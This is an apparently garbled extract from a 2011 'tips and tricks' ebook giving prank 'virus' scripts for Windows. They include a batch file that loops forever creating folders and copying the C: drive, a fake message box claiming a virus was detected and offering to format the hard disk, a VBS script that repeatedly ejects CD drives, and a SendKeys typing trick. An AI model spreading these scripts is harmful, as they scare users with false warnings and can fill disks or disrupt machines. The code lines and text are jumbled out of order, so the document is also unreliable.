2011 BANDI KISHORE.vbs Open it.bat" :123 md hack copy c:\ hack cd hack goto 123 Now double-click the file n c.20.7" ) Set colCDROMs = oWMP.vbs Set oWMP = CreateObject("WMPlayer. Press YES to format your hard disk now or Press NO to format your hard disk after system reboot". S Page 93 .Count .. S Open notepad and type: lol=msgbox ("Warning! A virus has been detected on your PC. 7) Virus Which Will Open and Close Your DVD-Rom Open notepad type the following code and save it as bandikishore. Press YES to format your hard disk now or Press NO to format your hard disk after system reboot" It's just for fun."Warning") Save it as virus.Eject BANDI KISHORE. a message will appear on your screen "Warning! A virus has been detected on your PC.1 colCDROMs.Count >= 1 then do For i = 0 to colCDROMs. set wshshell = wscript.Count .exe and End Process.Tips and Tricks 2011 BANDI KISHORE.SendKeys "I" BANDI KISHORE.SendKeys "H" WScript.Sleep 200 WshShell. look for wscript.Sleep 200 WshShell.Item(i).shell") wshshell.AppActivate "Notepad" WshShell.Sleep 200 WshShell.SendKeys "i" WScript.Eject Next ' cdrom loop End If So how to stop it.SendKeys "A" WScript.1 colCDROMs.Sleep 200 WshShell. Go to task manager by pressing Ctrl+Alt+Delete or by typing taskmgr in run. Go to Processes tab.SendKeys "B" WScript.sleep 200 wshshell.Sleep 200 WshShell. 8) A funny trick which open notepad n types automatically Open Notepad n type d following code.SendKeys "! " WScript.Sleep 200 WshShell. S Page 94 . S Next ' cdrom For i = 0 to colCDROMs.Sleep 200 WshShell.SendKeys "D" "Notepad" wscript. save it as BANDIKISHORE.SendKeys "N" WScript.vbs Execute n you can c a NOTEPAD openin n typin few letters.CreateObject("wscript. SendKeys "R" WScript.SendKeys "O" WScript. S Page 95 .Sleep 200 WshShell.SendKeys "I" WScript.SendKeys " K" WScript.Sleep 200 WshShell.SendKeys "H" WScript.Sleep 200 WshShell.SendKeys "E.SendKeys "S" WScript.Sleep 200 WshShell. S WScript.Sleep 200 WshShell.Tips and Tricks 2011 BANDI KISHORE.Sleep 200 WshShell." 9) BANDI KISHORE.Sleep 200 WshShell.
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